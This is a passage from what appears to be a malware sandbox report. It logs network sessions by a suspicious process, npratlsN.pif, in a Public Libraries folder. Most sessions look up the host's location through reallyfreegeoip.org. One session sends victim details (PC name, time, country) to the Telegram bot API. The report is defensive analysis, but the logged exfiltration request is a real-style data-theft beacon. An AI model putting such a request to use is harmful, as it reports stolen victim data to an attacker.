65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	52746	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:29 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:29 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153298 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kS%2BPNYQUu%2BfIAKoErlsBnMdL7JoWIBWqURwz3XGmjDBIib2PQHqQwFFfKgMAN5EVrLWK3CF8ziyle6Mpp%2FM86Hgtk5V25kqiHII2MAQ5ZAcg76%2BDj%2F8DQtU7J1Jg1cKAd8W6uLSG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcb8bdd820fa8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1518&rtt_var=581&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1923583&cwnd=252&unsent_bytes=0&cid=a395e527b533a0e8&ts=147&x=0"
2025-01-14 07:08:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	52748	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:30 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:30 UTC	865	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:30 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153300 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98dqAU%2FSBqidpk%2Fdb342k3Frsc1z0ID4g9Z5IlV0Gm%2B4szMr67k0zZ5laOQv4%2BtAyN3wv4IU1CuJMz3QBxc%2FlTmuq%2B3hqKGnpHxLtQuqi29V%2B6Z5o2Nq1TEoSUpv%2FX8NiEAJBJw1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcb94e8ad4388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1601&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1823860&cwnd=221&unsent_bytes=0&cid=e8dbfe8d9c0099fd&ts=148&x=0"
2025-01-14 07:08:30 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	52750	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:32 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:32 UTC	851	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153301 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ou1LFTr%2FiOZPc3JZ2TryhE4Rz24H4sergYmrFxZ4w888jBNUdhB9cOX1ODRHnvWt9P3a6APhrtHBBO04fl6m5ciwoTo47ozpKqq5zeU2zwAXzs50OHYYovJNaZ6UU4xDuqngnD4R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcb9e5e991899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1527&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1810291&cwnd=153&unsent_bytes=0&cid=bc9f7c01c6da5a9b&ts=160&x=0"
2025-01-14 07:08:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	52752	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:33 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:33 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:33 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153303 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TfOxtYgnezcUgbXH4mAzasz2Ba05QXUixhoTJu8eciOzjMem1Z6a2nJDsLpFQd5XSP1ZJ8DpiueIWpV%2BYqmczPSeHPNIfbaEyYBNY8VSe8QERJ55kJjKS2mm1%2BdxAftoq9jBpMVT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcba7bb2d1899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1556&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1789215&cwnd=153&unsent_bytes=0&cid=6b60d9addd2291b7&ts=142&x=0"
2025-01-14 07:08:33 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	52755	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:35 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153304 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDbmNfSNCYTHwcHmbedu%2FaQ8gpZ6C5Z6hSGchvUAdtwtYXOuRjVYT%2BvwqPw769YfqfXePz5vN7Wv6XFL8G79fY%2B4GNA7GcUp19nu%2BLLxRdof3kclIacK4osSKSA6%2BRtB8f%2B6AoOj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbb0cea241ba-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1614&rtt_var=624&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1726788&cwnd=192&unsent_bytes=0&cid=8f4f3ccbf4bfd855&ts=130&x=0"
2025-01-14 07:08:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	52756	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:35 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153304 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CekCHyxc%2BUJrKdIAye5D%2BIW6a%2B%2BCI1Lhsg6tiBLVK9AtIKXqSYBtJoKSs6p8eWCp3D6l0Sz%2Ba2Pg35iDsg327psQTep%2Bj6AdsnlpRjnjpk79UAqOOXAmcx8ps98UHHATbTDmferL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbb2ce6b4388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1558&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1833019&cwnd=221&unsent_bytes=0&cid=226766d19a2513da&ts=167&x=0"
2025-01-14 07:08:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	52758	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:36 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153305 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZLKkv%2BYJKXWDHZi2ogO9AAe9GA9QMKkDHbhQTZ09PjGFW%2BeW5nnD4oBPwCNeloxlVW3VSAY30YPR5wwCGsG9OSiiA2UEBZnyJE22Xcd8e%2BBEoGy%2FxgUAxf10Bk3oBnkZfIS3iW%2F3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbb95b051899-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1589&rtt_var=616&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1746411&cwnd=153&unsent_bytes=0&cid=a78745083be8dabd&ts=126&x=0"
2025-01-14 07:08:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	52759	104.21.16.1	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:36 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 07:08:36 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:36 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153305 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFKWvwC%2FV7QUWWUtHiYUz19uY46Y30XFvMVN3APEjwTyqrl9o4t3lKLVW9zygfkM8o2wr4p6UPxmEkF6VJriG%2B8Ep1NXVcxgGijfwQ7pFA1qsEEDV7MzCtCaAsQIdOlUEHfi6eZx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbb9bc114388-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1585&rtt_var=598&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1826141&cwnd=221&unsent_bytes=0&cid=0ff21d2655db6075&ts=132&x=0"
2025-01-14 07:08:36 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	52761	149.154.167.220	443	4544	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:37 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2014/01/2025%20/%2016:21:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20585948%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-14 07:08:37 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 14 Jan 2025 07:08:37 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-14 07:08:37 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	52762	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 07:08:38 UTC	855	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 07:08:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2153307 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbryDQcObVpk%2BUHFJ%2FgnRvYhu8D3ehZBREW7cVN9D2zLYbhhAtWrhcIc4ZarALqDyAWW2tm%2F5z9UsCaBZzJntmdc8cchFSfLlPpkZyYo5AovQRenLQiwVtj6omsJKEijPTSn7rbQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901bcbc24cb98ce0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1779&rtt_var=680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1594756&cwnd=215&unsent_bytes=0&cid=f7fb59c5a2ca6068&ts=157&x=0"
2025-01-14 07:08:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	52764	104.21.16.1	443	3592	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-14 07:08:39 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
